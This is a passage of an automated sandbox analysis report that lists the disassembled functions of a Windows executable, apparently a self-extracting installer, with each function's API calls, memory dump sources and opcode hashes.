                                                                                                                                                                                                                                                            Function 00624CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00624DB5
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00624DDD
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                            • API String ID: 3625706803-3647970563
                                                                                                                                                                                                                                                            • Opcode ID: 623dcf75a4539fa43ba22ac261dc52214b51821c43ae9ad2869dc49fbb9be271
                                                                                                                                                                                                                                                            • Instruction ID: 13ffa694217b9d70a342dafa4adec30a431b7ea91f671f3bfb35f8201fe81392
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 623dcf75a4539fa43ba22ac261dc52214b51821c43ae9ad2869dc49fbb9be271
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56412236204D228BCB219F28FD446F573A7AF45340F048A68E89697691DE72DE8ACF50
                                                                                                                                                                                                                                                            Function 00624C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00624C54
                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00624C66
                                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00624C7E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                                            • Opcode ID: bc83c2c72463107be73936a70002276f652f68cc840a4ac9396984e8b480ec3d
                                                                                                                                                                                                                                                            • Instruction ID: f398729ff6a31c1017b24878f8d69a3e902ef0f1d4187e198e87ec34c538afec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc83c2c72463107be73936a70002276f652f68cc840a4ac9396984e8b480ec3d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF0967260191D6F9B25DFB8DC49DFB77AEEF04294744452AE815C2150EE70E914CB60
                                                                                                                                                                                                                                                            Function 0062487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00624A23,?,00624F67,*MEMCAB,00008000,00000180), ref: 006248DE
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00624F67,*MEMCAB,00008000,00000180), ref: 00624902
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 4b3472c280a5c4ae0a609c31e7a8893195a385e7a0588311025935df3a40d206
                                                                                                                                                                                                                                                            • Instruction ID: 74888fdead6369092b4ff611fc12b0b68554a33ce64c1a7723a590c95c171a78
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b3472c280a5c4ae0a609c31e7a8893195a385e7a0588311025935df3a40d206
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C014BA3E2197026F3244129AC88FF7551ECB9A734F1B1335BDAAE72D1D9688C0585E0
                                                                                                                                                                                                                                                            Function 00624AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00623680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0062369F
                                                                                                                                                                                                                                                              • Part of subcall function 00623680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006236B2
                                                                                                                                                                                                                                                              • Part of subcall function 00623680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 006236DA
                                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00624B05
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1084409-0
                                                                                                                                                                                                                                                            • Opcode ID: e2e558e806a2cdaede6e5db0e01320ff269fdfe27ac2be3095044b31c5187298
                                                                                                                                                                                                                                                            • Instruction ID: 2eacad77ea758d245838bb365125e0d33ebd43eb6dd0893cce00fa32eba707ae
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2e558e806a2cdaede6e5db0e01320ff269fdfe27ac2be3095044b31c5187298
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C018031201A11ABD7248F58EC05BA2775BAB84726F149225F939972E0CB70D856CB50
                                                                                                                                                                                                                                                            Function 0062658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharPrevA.USER32(00628B3E,00628B3F,00000001,00628B3E,-00000003,?,006260EC,00621140,?), ref: 006265BA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CharPrev
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 122130370-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e5631b8ffd3bb246d1992b9f2ae4185d06e27fc18f50096dd48130df7ca3cbd
                                                                                                                                                                                                                                                            • Instruction ID: 03d1d65bd2c496f4e59668340aeb3e029d9267015fdd61ccf2acdd311dfa4353
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e5631b8ffd3bb246d1992b9f2ae4185d06e27fc18f50096dd48130df7ca3cbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F04232104A705BD331051DF884BA7BFDF9B86350F18015EF8DAE3345CA654C468BA4
                                                                                                                                                                                                                                                            Function 0062621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0062623F
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                              • Part of subcall function 00626285: GetLastError.KERNEL32(00625BBC), ref: 00626285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 381621628-0
                                                                                                                                                                                                                                                            • Opcode ID: def1351bb3cc33e4dc80dff24ce760186c53b22440fcf22da55520cac111b789
                                                                                                                                                                                                                                                            • Instruction ID: 8673c1f46ff8b4d13146b9ae15175caf00694c5960b637e3c20e8e4fc1d90d4c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: def1351bb3cc33e4dc80dff24ce760186c53b22440fcf22da55520cac111b789
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F0B4B0B00618ABD7A0EB74ED06BBE32AEDB44700F404069B986DA191DD7499458B54
                                                                                                                                                                                                                                                            Function 006266AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00624777,?,00624E38,?), ref: 006266B1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                            • Opcode ID: 07188e957c427bd108f526469c40969f32d07c308751afa6cae02c05e853532c
                                                                                                                                                                                                                                                            • Instruction ID: c34455fc88fab6db0b07b2560ec46c1365a57cf4d1294f9fd2a1aef18648c515
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07188e957c427bd108f526469c40969f32d07c308751afa6cae02c05e853532c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23B09276222850476A200671BC2999A2842A7C133ABE42B90F032D02E0CA7EC846D505
                                                                                                                                                                                                                                                            Function 00624B60 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?,00000000,00000000,?,00624FA1,00000000), ref: 00624B98
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: 646e8bc138effd0335743ebbaee31fc0f91329a210ef28ba6df7a11596bef9ff
                                                                                                                                                                                                                                                            • Instruction ID: 88b1ec7f8ac8dfb6e3ad9977a6347506e99219f4145dfe2f1562415f4bb95f22
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 646e8bc138effd0335743ebbaee31fc0f91329a210ef28ba6df7a11596bef9ff
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5F01231941F299E47718F39EC00692BBE7AFA53653105D2E946ED7390DF30A449CF90
                                                                                                                                                                                                                                                            Function 00624CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00624CAA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                                            • Opcode ID: f90df6e179b348ef6fd96be56fc8067417a12f55b67f8981c2ebf17056113786
                                                                                                                                                                                                                                                            • Instruction ID: aad3a3033ccfa7452bbaee63566f7db17075c4008ad453103aeea4e4ef2e133b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90df6e179b348ef6fd96be56fc8067417a12f55b67f8981c2ebf17056113786
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DB0123204420CBBCF101FC2EC09F853F1EE7C47A5F140000F60C450508AB294118696
                                                                                                                                                                                                                                                            Function 00624CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                                            • Opcode ID: 9b663c1cb3a0689f755d5b1b6a5fe043dd23c6a6ec8958924b29223c33ed71e3
                                                                                                                                                                                                                                                            • Instruction ID: 70bdfea9e84facb315700aef4a4c1196ab420b4ae4f8e19e0a3d4da9d48c27a7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b663c1cb3a0689f755d5b1b6a5fe043dd23c6a6ec8958924b29223c33ed71e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51B0123100010CBB8F101B82EC088453F1ED7C02A47000010F50C410218B7398128585

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 00625C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00625CEE
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00628B3E,00000104,00000000,?,?), ref: 00625DFC
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00625E3E
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00625EE1
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00625F6F
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00625FA7
                                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00626008
                                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 006260AA
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00621140,00000000,00000040,00000000), ref: 006261F1
                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 006261F8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                                            • Opcode ID: 8f0a183b010f2d9ce57ee3fead1806ea40f0166f43af5bc40d86c34f039bb98b
                                                                                                                                                                                                                                                            • Instruction ID: d686a26b443c2a5213542625ab2169ae48f06d6ffa17a2ff8e750ba2a3fcadca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f0a183b010f2d9ce57ee3fead1806ea40f0166f43af5bc40d86c34f039bb98b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54D13671A04E745EDB358B38BD4C7FA3B63AB26344F1440AAD4C7C6690DAB08E878F05
                                                                                                                                                                                                                                                            Function 00621F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94shutdownCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00621EFB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00621F02
                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00621FD3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                                            • Opcode ID: f9eb86e84b5117e35049820bdd60ba3def7aeb7b7d6df29c098f9a0baa6ba6f2
                                                                                                                                                                                                                                                            • Instruction ID: 1c6568e768b81d6f3f4400e2649e1a76c10ffb47d7eeb7e8e20a1ecc366479fe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9eb86e84b5117e35049820bdd60ba3def7aeb7b7d6df29c098f9a0baa6ba6f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB21FC71B44A156BDB305BE1AD4EFBF76FBDB96B10F10001DFA01DA180D77488029A65
                                                                                                                                                                                                                                                            Function 00626CF0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00626E26,00621000), ref: 00626CF7
                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,00626E26,00621000), ref: 00626D00
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00626E26,00621000), ref: 00626D0B
                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00626E26,00621000), ref: 00626D12
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                                            • Opcode ID: dfdd5ca08a3a6c5d15b76b8243093990b31a45d459189b32f56b73abe2a900de
                                                                                                                                                                                                                                                            • Instruction ID: 408474359025777dff1826a9bc0162a8009873c6654ac7bbc92b43627da0e133
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfdd5ca08a3a6c5d15b76b8243093990b31a45d459189b32f56b73abe2a900de
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63D0C932000908BBEB202BE1EC0CA593F2AEB48272F446000F31986020CBB244628B52
                                                                                                                                                                                                                                                            Function 00623210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00628598,00000200), ref: 00623271
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 006233E2
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 006233F7
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00623410
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00623426
                                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 0062342D
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0062343F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
